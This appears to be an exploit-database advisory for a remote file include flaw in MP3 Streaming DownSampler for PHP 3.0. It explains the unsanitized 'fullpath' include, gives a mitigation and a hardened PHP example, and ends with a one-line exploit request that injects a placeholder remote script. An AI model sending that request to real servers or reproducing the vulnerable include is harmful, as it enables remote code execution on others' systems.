Vendor: MP3 Streaming DownSampler for PHP
By: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide
CVSS: 7.5 (HIGH)
CWE: 98 (Remote File Include)
Product Name: MP3 Streaming DownSampler for PHP
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mp3_streaming_downsampler_for_php:mp3_streaming_downsampler_for_php:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2006

MP3 Streaming DownSampler for PHP v3.0 (fullpath) Remote File Include Exploit

The vulnerability exists because user-supplied input passed via the 'fullpath' parameter to the 'Core/core.inc.php' script is not sanitized before being interpolated into a require_once() call. An attacker who passes a URL in 'fullpath' can cause arbitrary files from remote locations to be included and executed. Successful exploitation requires that 'allow_url_include' is set to 'On' in the 'php.ini' configuration file.

Mitigation:

Disable 'allow_url_include' in the 'php.ini' configuration file.
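The following is an added example, not code from the mp3SDS project: it places the vulnerable pattern quoted in the advisory beside a hardened form. It assumes that `$fullpath` is populated from the request (as with register_globals=On or an explicit assignment) and that the include base should be the script's own directory; the `Plugins` subdirectory in the allow-list is a hypothetical name.

```php
<?php
// Added example (not the project's code). Assumes 'fullpath' arrives from
// the request, as it would with register_globals=On or an explicit assignment.

// Vulnerable pattern, as in the advisory: a request-controlled value is
// interpolated straight into require_once, so a URL becomes a remote include
// (when allow_url_include is On) and a local path becomes a local include.
function include_format_name_vulnerable($fullpath) {
    require_once("$fullpath/Core/FormatName.fnc.php");
}

// Hardened form: never derive the include base from the request. Resolve it
// from the script's own location, which the caller cannot influence.
function include_format_name_hardened() {
    $base = dirname(__FILE__);            // fixed, not request-controlled
    require_once $base . '/Core/FormatName.fnc.php';
}

// If a variable directory really must be chosen by the caller, validate it
// against an allow-list and verify the resolved path stays under $base.
// 'Plugins' is a hypothetical entry used only to show a multi-item list.
function resolve_under_base($base, $subdir) {
    $allowed = array('Core', 'Plugins');
    if (!in_array($subdir, $allowed, true)) {
        return false;                     // unknown directory: refuse
    }
    $real     = realpath($base . '/' . $subdir);
    $realBase = realpath($base);
    // realpath() collapses '..' and symlinks; a prefix check then catches
    // anything that escaped the base, and false covers a missing directory.
    if ($real === false || $realBase === false
        || strpos($real, $realBase . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $real;
}
```

Note that setting 'allow_url_include' to Off blocks only the remote variant; the allow-list and realpath check above are what prevent the same unsanitized value from including an arbitrary local file.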

Exploit-DB raw data:

Script: MP3 Streaming DownSampler for PHP v3.0 (fullpath) Remote File Include Exploit
Version: 3.0
Script Download: http://damac.us/Projects/mp3SDS/archive/mp3SDS-3.0.tgz
Code: require_once("$fullpath/Core/FormatName.fnc.php");
Exploit: Core/core.inc.php?fullpath=evilscripts?
Found: Cyber-Security
Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

# milw0rm.com [2006-10-28]